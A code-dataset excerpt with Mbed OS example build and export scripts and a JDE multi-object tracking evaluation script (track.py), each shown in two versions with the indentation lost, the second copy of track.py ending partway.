logging.warning("'%s' example directory already exists. Deleting..." % name)
rmtree(name, onerror=remove_readonly)
cmd = "git clone %s" % example['github']
for i in range(0, retry):
logging.info("Executing command '%s'..." % cmd)
if not subprocess.call(cmd, shell=True):
break
else:
logging.error("unable to clone the repo '%s'" % name)
return 1
return 0
def deploy_repos(config, exp_filter):
""" If the example directory exists as provided by the json config file,
pull in the examples dependencies by using `mbed-cli deploy`.
Args:
config - the json object imported from the file.
"""
print("\nDeploying example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
os.chdir(name)
logging.info("In folder '%s'" % name)
cmd = "mbed-cli deploy"
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
os.chdir(CWD)
if result:
logging.error("mbed-cli deploy command failed for '%s'" % name)
return result
else:
logging.info("'%s' example directory doesn't exist. Skipping..." % name)
return 1
return 0
def export_repos(config, ides, targets, exp_filter):
"""Exports and builds combinations of example programs, targets and IDEs.
The results are returned in a [key: value] dictionary format:
Where key = The example name from the json config file
value = a list containing: pass_status, successes, export failures, build_failures,
and build_skips
where pass_status = The overall pass status for the export of the full
set of example programs comprising the example suite.
IE they must build and export) True if all examples pass, false otherwise
successes = list of examples that exported and built (if possible)
If the exporter has no build functionality, then it is a pass
if exported
export_failures = list of examples that failed to export.
build_failures = list of examples that failed to build
build_skips = list of examples that cannot build
Both successes and failures contain the example name, target and IDE
Args:
config - the json object imported from the file.
ides - List of IDES to export to
"""
results = {}
print("\nExporting example repos....\n")
for example in config['examples']:
if example['name'] not in exp_filter:
continue
export_failures = []
build_failures = []
build_skips = []
successes = []
exported = True
pass_status = True
if example['export']:
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
# Check that the target, IDE, and features combinations are valid and return a
# list of valid combinations to work through
for target, ide in target_cross_ide(valid_choices(example['targets'], targets),
valid_choices(example['exporters'], ides),
example['features'], example['toolchains']):
example_summary = {"name" : name, "target" : target, "ide" : ide }
summary_string = "%s %s %s" % (name, target, ide)
logging.info("Exporting %s" % summary_string)
cmd = ["mbed-cli", "export", "-i", ide, "-m", target]
logging.info("Executing command '%s'..." % " ".join(cmd))
proc = subprocess.Popen(cmd)
proc.wait()
if proc.returncode:
export_failures.append(example_summary)
logging.error("FAILURE exporting %s" % summary_string)
else:
logging.info("SUCCESS exporting %s" % summary_string)
logging.info("Building %s" % summary_string)
try:
if EXPORTERS[ide].build(name, cleanup=False):
logging.error("FAILURE building %s" % summary_string)
build_failures.append(example_summary)
else:
logging.info("SUCCESS building %s" % summary_string)
successes.append(example_summary)
except TypeError:
successes.append(example_summary)
build_skips.append(example_summary)
os.chdir(CWD)
if len(build_failures+export_failures) > 0:
pass_status= False
else:
exported = False
results[example['name']] = [exported, pass_status, successes,
export_failures, build_failures, build_skips]
return results
def compile_repos(config, toolchains, targets, profiles, verbose, exp_filter, cmake=False ,jobs=0):
"""Compiles combinations of example programs, targets and compile chains.
The results are returned in a [key: value] dictionary format:
Where key = The example name from the json config file
value = a list containing: pass_status, successes, and failures
where pass_status = The overall pass status for the compilation of the full
set of example programs comprising the example suite.
True if all examples pass, false otherwise
successes = list of passing examples.
failures = list of failing examples.
Both successes and failures contain the example name, target and compile chain
Args:
config - the json object imported from the file.
toolchains - List of toolchains to compile for.
targets - list of target names
profile - build profile path or name if in default place
verbose - enabling verbose
exp_filter - List of exp_filter to be build
jobs - Number of compile jobs
"""
results = {}
test_json = {"builds":{}}
base_path = os.getcwd()
print("\nCompiling example repos....\n")
for example in config['examples']:
if example['name'] not in exp_filter:
continue
failures = []
successes = []
compiled = True
pass_status = True
if example['test']:
if not ('baud_rate' in example and 'compare_log'in example):
logging.warning("'baud_rate' or 'compare_log' keys are missing from config json file")
example['test'] = False
if example['compile']:
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
# Check that the target, toolchain and features combinations are valid and return a
# list of valid combinations to work through
for target, toolchain in target_cross_toolchain(valid_choices(example['targets'], targets),
valid_choices(example['toolchains'], toolchains),
example['features']):
example_summary = {"name" : name, "target" : target, "toolchain" : toolchain, "test": "UNSET"}
summary_string = "%s %s %s" % (name, target, toolchain)
logging.info("Compiling %s" % summary_string)
if cmake:
build_command_seq = ["mbed-tools compile -t {} -m {} -c".format(toolchain, target)]
else:
build_command_seq = ["mbed-cli compile -t {} -m {} -j {} {}".format(toolchain, target, str(jobs), '-vv' if verbose else '') ]
if profiles:
for profile in profiles:
build_command_seq[0] += " --profile {}".format(profile)
failed_flag = False
for build_command in build_command_seq:
logging.info("Executing command '%s'..." % build_command)
proc = subprocess.Popen(build_command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
std_out, std_err = proc.communicate()
std_out = std_out.decode()
std_err = std_err.decode()
print ("\n#### STDOUT ####\n%s\n#### STDERR ####\n%s\n#### End of STDOUT/STDERR ####\n" % (std_out,std_err))
if proc.returncode:
failures.append(example_summary)
failed_flag = True
break
if not failed_flag:
if example['test']:
log = example['compare_log'].pop(0)
# example['compare_log'] is a list of log file/files, which matches each examples/sub-examples from same repo.
# pop the log file out of list regardless the compilation for each example pass of fail
image = fetch_output_image(std_out,cmake)
if image:
image_info = [{"binary_type": "bootable","path": normpath(join(name,image)),"compare_log":log}]
test_group = "{}-{}-{}".format(target, toolchain, example['baud_rate'])
if not test_group in test_json['builds']:
test_json['builds'][test_group] = {
"platform":target ,
"toolchain": toolchain ,
"base_path": base_path ,
"baud_rate": int(example['baud_rate']),
"tests":{} }
test_json['builds'][test_group]['tests'][name]={"binaries":image_info}
example_summary["test"] = "TEST_ON"
else:
logging.warning("could not find built image for example %s" % name)
example_summary["test"] = "NO_IMAGE"
else:
logging.warning("Test for %s will not be generated." % name)
example_summary["test"] = "TEST_OFF"
successes.append(example_summary)
os.chdir(CWD)
# If there are any compilation failures for the example 'set' then the overall status is fail.
if len(failures) > 0:
pass_status = False
else:
compiled = False
results[example['name']] = [compiled, pass_status, successes, failures]
write_json_to_file(test_json, "test_spec.json")
return results
def update_example_version(config, tag, exp_filter):
""" For each example repo identified in the config json object, update the version of
example to that specified by the supplied GitHub tag. This function assumes that each
example repo has already been cloned.
Args:
config - the json object imported from the file.
tag - GitHub tag corresponding to a version of mbed-os to upgrade to.
"""
print("\nUpdating example to version(branch) '%s'\n" % tag)
for example in config['examples']:
name = example['name']
if name in exp_filter:
os.chdir(name)
logging.info("In folder '%s'" % name)
cmd = "git checkout -B %s origin/%s" %(tag, tag)
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
os.chdir(CWD)
if result:
return result
return 0
def symlink_mbedos(config, path, exp_filter):
""" Create a symbolic link in each example folder to given path
If a mbed-os.lib can be found in the folder, it will be removed
"""
print("\nCreating mbed-os Symbolic link to '%s'\n" % path)
for example in config['examples']:
if example['name'] not in exp_filter:
continue
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
if os.path.exists("mbed-os.lib"):
logging.info("Replacing 'mbed-os.lib' with empty file in '%s'" % name)
open("mbed-os.lib", 'w').close()
else:
logging.warning("No 'mbed-os.lib' found in '%s'" % name)
if os.path.exists("mbed-os"):
logging.warning("'mbed-os' already existed in '%s'" % name)
else:
logging.info("Creating Symbolic link '%s'->'mbed-os'" % path)
os.symlink(path, "mbed-os")
#Cmake tool currently require 'mbed-os.lib' to be present to perform build.
#Add a empty 'mbed-os.lib' as a workaround
open('mbed-os.lib', 'a').close()
os.chdir(CWD)
return 0
def fetch_output_image(output,cmake):
"""Find the build image from the last 30 lines of a given log"""
lines = output.splitlines()
last_index = -31 if len(lines)>29 else (-1 - len(lines))
for index in range(-1,last_index,-1):
if cmake:
if lines[index].startswith("-- built:") and lines[index].endswith(".bin"):
image = lines[index][10:]
print("IMAGE is " + image)
if os.path.isfile(image):
return os.path.relpath(image)
else:
if lines[index].startswith("Image:"):
image = lines[index][7:]
if os.path.isfile(image):
return image
return False
| 42.859287 | 149 | 0.573761 |
import os
from os.path import dirname, abspath, basename, join, normpath
import os.path
import sys
import copy
import stat
import subprocess
from shutil import rmtree
import json
import logging
logging.basicConfig(level=logging.DEBUG, format='[EXAMPLES]> %(levelname)-8s %(message)s')
MBED_OS_ROOT = abspath(dirname(dirname(dirname(dirname(__file__)))))
CWD = os.getcwd()
sys.path.insert(0, MBED_OS_ROOT)
from tools.build_api import get_mbed_official_release
from tools.targets import TARGET_MAP
from tools.export import EXPORTERS
from tools.project import EXPORTER_ALIASES
from tools.toolchains import TOOLCHAINS
from tools.utils import write_json_to_file
from prettytable import PrettyTable
SUPPORTED_TOOLCHAINS = list(TOOLCHAINS - set(u'uARM'))
SUPPORTED_IDES = [exp for exp in list(EXPORTERS) + list(EXPORTER_ALIASES)
if exp != "cmsis" and exp != "zip"]
def get_table_from_pretty_table(pretty_table):
rows = []
for pretty_row in pretty_table:
row = {}
for key in pretty_table.field_names:
pretty_row.border = False
pretty_row.header = False
row[key] = pretty_row.get_string(fields=[key]).strip()
rows.append(row)
return rows
def get_build_summary(results):
pass_table = PrettyTable()
pass_table.field_names = ["EXAMPLE NAME", "TARGET", "TOOLCHAIN", "TEST GEN", "BUILD RESULT"]
pass_table.align["EXAMPLE NAME"] = "l"
fail_table = copy.deepcopy(pass_table)
failure_counter = 0
for exp, status in list(results.items()):
for summary in status[2]:
pass_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "PASSED"])
for summary in status[3]:
fail_table.add_row([summary["name"], summary["target"], summary["toolchain"], summary["test"], "FAILED"])
failure_counter+=1
print("\n\nPassed Example Compilation:")
print(pass_table)
if (failure_counter > 0):
print("\n\nFailed Example Compilation:")
print(fail_table)
print("Number of failures = %d" % failure_counter)
rows = get_table_from_pretty_table(pass_table) + get_table_from_pretty_table(fail_table)
with open("build_data.json", "w") as write_file:
json.dump(rows, write_file, indent=4, sort_keys=True)
return failure_counter
def get_export_summary(results):
pass_table = PrettyTable()
pass_table.field_names = ["EXAMPLE NAME", "TARGET", "IDE", "EXPORT RESULT", "BUILD RESULT"]
pass_table.align["EXAMPLE NAME"] = "l"
fail_table = copy.deepcopy(pass_table)
failure_counter = 0
for exp, status in list(results.items()):
for summary in status[2]:
pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "PASSED"])
for summary in status[3]:
fail_table.add_row([summary["name"], summary["target"], summary["ide"], "FAILED", ""])
failure_counter+=1
for summary in status[4]:
fail_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "FAILED"])
failure_counter+=1
for summary in status[5]:
pass_table.add_row([summary["name"], summary["target"], summary["ide"], "PASSED", "SKIPPED"])
print("\n\nPassed Example Exporting:")
print(pass_table)
if (failure_counter > 0):
print("\n\nFailed Example Exporting:")
print(fail_table)
print("Number of failures = %d" % failure_counter)
return failure_counter
def valid_choices(allowed_choices, all_choices):
if len(allowed_choices) > 0:
return [t for t in all_choices if t in allowed_choices]
else:
return all_choices
def target_cross_toolchain(allowed_targets, allowed_toolchains, features=[]):
for target in allowed_targets:
for toolchain in allowed_toolchains:
if all(feature in TARGET_MAP[target].features
for feature in features):
yield target, toolchain
def target_cross_ide(allowed_targets, allowed_ides, features=[], toolchains=[]):
for target in allowed_targets:
for ide in allowed_ides:
if (EXPORTERS[ide].is_target_supported(target) and
(not toolchains or EXPORTERS[ide].TOOLCHAIN in toolchains) and
all(feature in TARGET_MAP[target].features
for feature in features)):
yield target, ide
def get_sub_examples_list(example):
sub_examples = []
if example['sub-repo-example']:
for sub in example['subs']:
sub_examples.append("%s/%s" % (example["name"], sub))
else:
sub_examples.append(example["name"])
return sub_examples
def source_repos(config, exp_filter):
print("\nImporting example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
logging.warning("'%s' example directory already exists. Deleting..." % name)
rmtree(name)
cmd = "mbed-cli import %s" % example['github']
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
if result:
return result
return 0
def clone_repos(config, exp_filter , retry = 3):
print("\nCloning example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
logging.warning("'%s' example directory already exists. Deleting..." % name)
rmtree(name, onerror=remove_readonly)
cmd = "git clone %s" % example['github']
for i in range(0, retry):
logging.info("Executing command '%s'..." % cmd)
if not subprocess.call(cmd, shell=True):
break
else:
logging.error("unable to clone the repo '%s'" % name)
return 1
return 0
def deploy_repos(config, exp_filter):
print("\nDeploying example repos....\n")
for example in config['examples']:
name = example['name']
if name in exp_filter:
if os.path.exists(name):
os.chdir(name)
logging.info("In folder '%s'" % name)
cmd = "mbed-cli deploy"
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
os.chdir(CWD)
if result:
logging.error("mbed-cli deploy command failed for '%s'" % name)
return result
else:
logging.info("'%s' example directory doesn't exist. Skipping..." % name)
return 1
return 0
def export_repos(config, ides, targets, exp_filter):
results = {}
print("\nExporting example repos....\n")
for example in config['examples']:
if example['name'] not in exp_filter:
continue
export_failures = []
build_failures = []
build_skips = []
successes = []
exported = True
pass_status = True
if example['export']:
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
# Check that the target, IDE, and features combinations are valid and return a
# list of valid combinations to work through
for target, ide in target_cross_ide(valid_choices(example['targets'], targets),
valid_choices(example['exporters'], ides),
example['features'], example['toolchains']):
example_summary = {"name" : name, "target" : target, "ide" : ide }
summary_string = "%s %s %s" % (name, target, ide)
logging.info("Exporting %s" % summary_string)
cmd = ["mbed-cli", "export", "-i", ide, "-m", target]
logging.info("Executing command '%s'..." % " ".join(cmd))
proc = subprocess.Popen(cmd)
proc.wait()
if proc.returncode:
export_failures.append(example_summary)
logging.error("FAILURE exporting %s" % summary_string)
else:
logging.info("SUCCESS exporting %s" % summary_string)
logging.info("Building %s" % summary_string)
try:
if EXPORTERS[ide].build(name, cleanup=False):
logging.error("FAILURE building %s" % summary_string)
build_failures.append(example_summary)
else:
logging.info("SUCCESS building %s" % summary_string)
successes.append(example_summary)
except TypeError:
successes.append(example_summary)
build_skips.append(example_summary)
os.chdir(CWD)
if len(build_failures+export_failures) > 0:
pass_status= False
else:
exported = False
results[example['name']] = [exported, pass_status, successes,
export_failures, build_failures, build_skips]
return results
def compile_repos(config, toolchains, targets, profiles, verbose, exp_filter, cmake=False ,jobs=0):
results = {}
test_json = {"builds":{}}
base_path = os.getcwd()
print("\nCompiling example repos....\n")
for example in config['examples']:
if example['name'] not in exp_filter:
continue
failures = []
successes = []
compiled = True
pass_status = True
if example['test']:
if not ('baud_rate' in example and 'compare_log'in example):
logging.warning("'baud_rate' or 'compare_log' keys are missing from config json file")
example['test'] = False
if example['compile']:
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
# Check that the target, toolchain and features combinations are valid and return a
# list of valid combinations to work through
for target, toolchain in target_cross_toolchain(valid_choices(example['targets'], targets),
valid_choices(example['toolchains'], toolchains),
example['features']):
example_summary = {"name" : name, "target" : target, "toolchain" : toolchain, "test": "UNSET"}
summary_string = "%s %s %s" % (name, target, toolchain)
logging.info("Compiling %s" % summary_string)
if cmake:
build_command_seq = ["mbed-tools compile -t {} -m {} -c".format(toolchain, target)]
else:
build_command_seq = ["mbed-cli compile -t {} -m {} -j {} {}".format(toolchain, target, str(jobs), '-vv' if verbose else '') ]
if profiles:
for profile in profiles:
build_command_seq[0] += " --profile {}".format(profile)
failed_flag = False
for build_command in build_command_seq:
logging.info("Executing command '%s'..." % build_command)
proc = subprocess.Popen(build_command.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
std_out, std_err = proc.communicate()
std_out = std_out.decode()
std_err = std_err.decode()
print ("\n#### STDOUT ####\n%s\n#### STDERR ####\n%s\n#### End of STDOUT/STDERR ####\n" % (std_out,std_err))
if proc.returncode:
failures.append(example_summary)
failed_flag = True
break
if not failed_flag:
if example['test']:
log = example['compare_log'].pop(0)
# example['compare_log'] is a list of log file/files, which matches each examples/sub-examples from same repo.
# pop the log file out of list regardless the compilation for each example pass of fail
image = fetch_output_image(std_out,cmake)
if image:
image_info = [{"binary_type": "bootable","path": normpath(join(name,image)),"compare_log":log}]
test_group = "{}-{}-{}".format(target, toolchain, example['baud_rate'])
if not test_group in test_json['builds']:
test_json['builds'][test_group] = {
"platform":target ,
"toolchain": toolchain ,
"base_path": base_path ,
"baud_rate": int(example['baud_rate']),
"tests":{} }
test_json['builds'][test_group]['tests'][name]={"binaries":image_info}
example_summary["test"] = "TEST_ON"
else:
logging.warning("could not find built image for example %s" % name)
example_summary["test"] = "NO_IMAGE"
else:
logging.warning("Test for %s will not be generated." % name)
example_summary["test"] = "TEST_OFF"
successes.append(example_summary)
os.chdir(CWD)
# If there are any compilation failures for the example 'set' then the overall status is fail.
if len(failures) > 0:
pass_status = False
else:
compiled = False
results[example['name']] = [compiled, pass_status, successes, failures]
write_json_to_file(test_json, "test_spec.json")
return results
def update_example_version(config, tag, exp_filter):
print("\nUpdating example to version(branch) '%s'\n" % tag)
for example in config['examples']:
name = example['name']
if name in exp_filter:
os.chdir(name)
logging.info("In folder '%s'" % name)
cmd = "git checkout -B %s origin/%s" %(tag, tag)
logging.info("Executing command '%s'..." % cmd)
result = subprocess.call(cmd, shell=True)
os.chdir(CWD)
if result:
return result
return 0
def symlink_mbedos(config, path, exp_filter):
print("\nCreating mbed-os Symbolic link to '%s'\n" % path)
for example in config['examples']:
if example['name'] not in exp_filter:
continue
for name in get_sub_examples_list(example):
os.chdir(name)
logging.info("In folder '%s'" % name)
if os.path.exists("mbed-os.lib"):
logging.info("Replacing 'mbed-os.lib' with empty file in '%s'" % name)
open("mbed-os.lib", 'w').close()
else:
logging.warning("No 'mbed-os.lib' found in '%s'" % name)
if os.path.exists("mbed-os"):
logging.warning("'mbed-os' already existed in '%s'" % name)
else:
logging.info("Creating Symbolic link '%s'->'mbed-os'" % path)
os.symlink(path, "mbed-os")
#Cmake tool currently require 'mbed-os.lib' to be present to perform build.
#Add a empty 'mbed-os.lib' as a workaround
open('mbed-os.lib', 'a').close()
os.chdir(CWD)
return 0
def fetch_output_image(output,cmake):
lines = output.splitlines()
last_index = -31 if len(lines)>29 else (-1 - len(lines))
for index in range(-1,last_index,-1):
if cmake:
if lines[index].startswith("-- built:") and lines[index].endswith(".bin"):
image = lines[index][10:]
print("IMAGE is " + image)
if os.path.isfile(image):
return os.path.relpath(image)
else:
if lines[index].startswith("Image:"):
image = lines[index][7:]
if os.path.isfile(image):
return image
return False
| true | true |
f72eb9f4639cbc1da62b470e79d10c5da4bfa8a1 | 9,904 | py | Python | track.py | ddasdkimo/Towards-Realtime-MOT | cfe0e26331969450b6e2a645dfa5c14947514ba5 | [
"MIT"
] | null | null | null | track.py | ddasdkimo/Towards-Realtime-MOT | cfe0e26331969450b6e2a645dfa5c14947514ba5 | [
"MIT"
] | null | null | null | track.py | ddasdkimo/Towards-Realtime-MOT | cfe0e26331969450b6e2a645dfa5c14947514ba5 | [
"MIT"
] | null | null | null | import os
import os.path as osp
import cv2
import logging
import argparse
import motmetrics as mm
import torch
from tracker.multitracker import JDETracker
from utils import visualization as vis
from utils.log import logger
from utils.timer import Timer
from utils.evaluation import Evaluator
from utils.parse_config import parse_model_cfg
import utils.datasets as datasets
from utils.utils import *
def write_results(filename, results, data_type):
if data_type == 'mot':
save_format = '{frame},{id},{x1},{y1},{w},{h},1,-1,-1,-1\n'
elif data_type == 'kitti':
save_format = '{frame} {id} pedestrian 0 0 -10 {x1} {y1} {x2} {y2} -10 -10 -10 -1000 -1000 -1000 -10\n'
else:
raise ValueError(data_type)
with open(filename, 'w') as f:
for frame_id, tlwhs, track_ids in results:
if data_type == 'kitti':
frame_id -= 1
for tlwh, track_id in zip(tlwhs, track_ids):
if track_id < 0:
continue
x1, y1, w, h = tlwh
x2, y2 = x1 + w, y1 + h
line = save_format.format(frame=frame_id, id=track_id, x1=x1, y1=y1, x2=x2, y2=y2, w=w, h=h)
f.write(line)
logger.info('save results to {}'.format(filename))
def conversion_frame_init(opt,frame_rate):
global tracker,timer,results,frame_id,objopt,resultscamera
objopt = opt
tracker = JDETracker(opt, frame_rate=frame_rate)
timer = Timer()
results = []
resultscamera = [None] * 1000
frame_id = 0
def conversion_frame(img, img0):
global tracker,timer,resultscamera,frame_id,objopt
# run tracking
timer.tic()
blob = torch.from_numpy(img).cuda().unsqueeze(0)
online_targets = tracker.update(blob, img0)
online_tlwhs = []
online_ids = []
for t in online_targets:
tlwh = t.tlwh
tid = t.track_id
vertical = tlwh[2] / tlwh[3] > 1.6
if tlwh[2] * tlwh[3] > objopt.min_box_area and not vertical:
online_tlwhs.append(tlwh)
online_ids.append(tid)
timer.toc()
count = frame_id%1000
resultscamera[count] = (frame_id + 1, online_tlwhs, online_ids)
online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
fps=1. / timer.average_time)
frame_id += 1
return online_im,resultscamera[count]
def eval_seq(opt, dataloader, data_type, result_filename, save_dir=None, show_image=True, frame_rate=30):
'''
Processes the video sequence given and provides the output of tracking result (write the results in video file)
It uses JDE model for getting information about the online targets present.
Parameters
----------
opt : Namespace
Contains information passed as commandline arguments.
dataloader : LoadVideo
Instance of LoadVideo class used for fetching the image sequence and associated data.
data_type : String
Type of dataset corresponding(similar) to the given video.
result_filename : String
The name(path) of the file for storing results.
save_dir : String
Path to the folder for storing the frames containing bounding box information (Result frames).
show_image : bool
Option for shhowing individial frames during run-time.
frame_rate : int
Frame-rate of the given video.
Returns
-------
(Returns are not significant here)
frame_id : int
Sequence number of the last sequence
'''
if save_dir:
mkdir_if_missing(save_dir)
tracker = JDETracker(opt, frame_rate=frame_rate)
timer = Timer()
results = []
frame_id = 0
for path, img, img0 in dataloader:
if frame_id % 20 == 0:
logger.info('Processing frame {} ({:.2f} fps)'.format(frame_id, 1./max(1e-5, timer.average_time)))
# run tracking
timer.tic()
blob = torch.from_numpy(img).cuda().unsqueeze(0)
online_targets = tracker.update(blob, img0)
online_tlwhs = []
online_ids = []
for t in online_targets:
tlwh = t.tlwh
tid = t.track_id
vertical = tlwh[2] / tlwh[3] > 1.6
if tlwh[2] * tlwh[3] > opt.min_box_area and not vertical:
online_tlwhs.append(tlwh)
online_ids.append(tid)
timer.toc()
# save results
results.append((frame_id + 1, online_tlwhs, online_ids))
if show_image or save_dir is not None:
online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
fps=1. / timer.average_time)
if show_image:
cv2.imshow('online_im', online_im)
if save_dir is not None:
cv2.imwrite(os.path.join(save_dir, '{:05d}.jpg'.format(frame_id)), online_im)
frame_id += 1
# save results
write_results(result_filename, results, data_type)
return frame_id, timer.average_time, timer.calls
def main(opt, data_root='/data/MOT16/train', det_root=None, seqs=('MOT16-05',), exp_name='demo',
save_images=False, save_videos=False, show_image=True):
logger.setLevel(logging.INFO)
result_root = os.path.join(data_root, '..', 'results', exp_name)
mkdir_if_missing(result_root)
data_type = 'mot'
# Read config
cfg_dict = parse_model_cfg(opt.cfg)
opt.img_size = [int(cfg_dict[0]['width']), int(cfg_dict[0]['height'])]
# run tracking
accs = []
n_frame = 0
timer_avgs, timer_calls = [], []
for seq in seqs:
output_dir = os.path.join(data_root, '..','outputs', exp_name, seq) if save_images or save_videos else None
logger.info('start seq: {}'.format(seq))
dataloader = datasets.LoadImages(osp.join(data_root, seq, 'img1'), opt.img_size)
result_filename = os.path.join(result_root, '{}.txt'.format(seq))
meta_info = open(os.path.join(data_root, seq, 'seqinfo.ini')).read()
frame_rate = int(meta_info[meta_info.find('frameRate')+10:meta_info.find('\nseqLength')])
nf, ta, tc = eval_seq(opt, dataloader, data_type, result_filename,
save_dir=output_dir, show_image=show_image, frame_rate=frame_rate)
n_frame += nf
timer_avgs.append(ta)
timer_calls.append(tc)
# eval
logger.info('Evaluate seq: {}'.format(seq))
evaluator = Evaluator(data_root, seq, data_type)
accs.append(evaluator.eval_file(result_filename))
if save_videos:
output_video_path = osp.join(output_dir, '{}.mp4'.format(seq))
cmd_str = 'ffmpeg -f image2 -i {}/%05d.jpg -c:v copy {}'.format(output_dir, output_video_path)
os.system(cmd_str)
timer_avgs = np.asarray(timer_avgs)
timer_calls = np.asarray(timer_calls)
all_time = np.dot(timer_avgs, timer_calls)
avg_time = all_time / np.sum(timer_calls)
logger.info('Time elapsed: {:.2f} seconds, FPS: {:.2f}'.format(all_time, 1.0 / avg_time))
# get summary
metrics = mm.metrics.motchallenge_metrics
mh = mm.metrics.create()
summary = Evaluator.get_summary(accs, seqs, metrics)
strsummary = mm.io.render_summary(
summary,
formatters=mh.formatters,
namemap=mm.io.motchallenge_metric_names
)
print(strsummary)
Evaluator.save_summary(summary, os.path.join(result_root, 'summary_{}.xlsx'.format(exp_name)))
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='track.py')
parser.add_argument('--cfg', type=str, default='cfg/yolov3.cfg', help='cfg file path')
parser.add_argument('--weights', type=str, default='weights/latest.pt', help='path to weights file')
parser.add_argument('--iou-thres', type=float, default=0.5, help='iou threshold required to qualify as detected')
parser.add_argument('--conf-thres', type=float, default=0.5, help='object confidence threshold')
parser.add_argument('--nms-thres', type=float, default=0.4, help='iou threshold for non-maximum suppression')
parser.add_argument('--min-box-area', type=float, default=200, help='filter out tiny boxes')
parser.add_argument('--track-buffer', type=int, default=30, help='tracking buffer')
parser.add_argument('--test-mot16', action='store_true', help='tracking buffer')
parser.add_argument('--save-images', action='store_true', help='save tracking results (image)')
parser.add_argument('--save-videos', action='store_true', help='save tracking results (video)')
opt = parser.parse_args()
print(opt, end='\n\n')
if not opt.test_mot16:
seqs_str = '''MOT17-02-SDP
MOT17-04-SDP
MOT17-05-SDP
MOT17-09-SDP
MOT17-10-SDP
MOT17-11-SDP
MOT17-13-SDP
'''
data_root = '/home/wangzd/datasets/MOT/MOT17/images/train'
else:
seqs_str = '''MOT16-01
MOT16-03
MOT16-06
MOT16-07
MOT16-08
MOT16-12
MOT16-14'''
data_root = '/home/wangzd/datasets/MOT/MOT16/images/test'
seqs = [seq.strip() for seq in seqs_str.split()]
main(opt,
data_root=data_root,
seqs=seqs,
exp_name=opt.weights.split('/')[-2],
show_image=False,
save_images=opt.save_images,
save_videos=opt.save_videos)
| 39.935484 | 119 | 0.601373 | import os
import os.path as osp
import cv2
import logging
import argparse
import motmetrics as mm
import torch
from tracker.multitracker import JDETracker
from utils import visualization as vis
from utils.log import logger
from utils.timer import Timer
from utils.evaluation import Evaluator
from utils.parse_config import parse_model_cfg
import utils.datasets as datasets
from utils.utils import *
def write_results(filename, results, data_type):
if data_type == 'mot':
save_format = '{frame},{id},{x1},{y1},{w},{h},1,-1,-1,-1\n'
elif data_type == 'kitti':
save_format = '{frame} {id} pedestrian 0 0 -10 {x1} {y1} {x2} {y2} -10 -10 -10 -1000 -1000 -1000 -10\n'
else:
raise ValueError(data_type)
with open(filename, 'w') as f:
for frame_id, tlwhs, track_ids in results:
if data_type == 'kitti':
frame_id -= 1
for tlwh, track_id in zip(tlwhs, track_ids):
if track_id < 0:
continue
x1, y1, w, h = tlwh
x2, y2 = x1 + w, y1 + h
line = save_format.format(frame=frame_id, id=track_id, x1=x1, y1=y1, x2=x2, y2=y2, w=w, h=h)
f.write(line)
logger.info('save results to {}'.format(filename))
def conversion_frame_init(opt,frame_rate):
global tracker,timer,results,frame_id,objopt,resultscamera
objopt = opt
tracker = JDETracker(opt, frame_rate=frame_rate)
timer = Timer()
results = []
resultscamera = [None] * 1000
frame_id = 0
def conversion_frame(img, img0):
global tracker,timer,resultscamera,frame_id,objopt
timer.tic()
blob = torch.from_numpy(img).cuda().unsqueeze(0)
online_targets = tracker.update(blob, img0)
online_tlwhs = []
online_ids = []
for t in online_targets:
tlwh = t.tlwh
tid = t.track_id
vertical = tlwh[2] / tlwh[3] > 1.6
if tlwh[2] * tlwh[3] > objopt.min_box_area and not vertical:
online_tlwhs.append(tlwh)
online_ids.append(tid)
timer.toc()
count = frame_id%1000
resultscamera[count] = (frame_id + 1, online_tlwhs, online_ids)
online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
fps=1. / timer.average_time)
frame_id += 1
return online_im,resultscamera[count]
def eval_seq(opt, dataloader, data_type, result_filename, save_dir=None, show_image=True, frame_rate=30):
if save_dir:
mkdir_if_missing(save_dir)
tracker = JDETracker(opt, frame_rate=frame_rate)
timer = Timer()
results = []
frame_id = 0
for path, img, img0 in dataloader:
if frame_id % 20 == 0:
logger.info('Processing frame {} ({:.2f} fps)'.format(frame_id, 1./max(1e-5, timer.average_time)))
timer.tic()
blob = torch.from_numpy(img).cuda().unsqueeze(0)
online_targets = tracker.update(blob, img0)
online_tlwhs = []
online_ids = []
for t in online_targets:
tlwh = t.tlwh
tid = t.track_id
vertical = tlwh[2] / tlwh[3] > 1.6
if tlwh[2] * tlwh[3] > opt.min_box_area and not vertical:
online_tlwhs.append(tlwh)
online_ids.append(tid)
timer.toc()
results.append((frame_id + 1, online_tlwhs, online_ids))
if show_image or save_dir is not None:
online_im = vis.plot_tracking(img0, online_tlwhs, online_ids, frame_id=frame_id,
fps=1. / timer.average_time)
if show_image:
cv2.imshow('online_im', online_im)
if save_dir is not None:
cv2.imwrite(os.path.join(save_dir, '{:05d}.jpg'.format(frame_id)), online_im)
frame_id += 1
write_results(result_filename, results, data_type)
return frame_id, timer.average_time, timer.calls
def main(opt, data_root='/data/MOT16/train', det_root=None, seqs=('MOT16-05',), exp_name='demo',
save_images=False, save_videos=False, show_image=True):
logger.setLevel(logging.INFO)
result_root = os.path.join(data_root, '..', 'results', exp_name)
mkdir_if_missing(result_root)
data_type = 'mot'
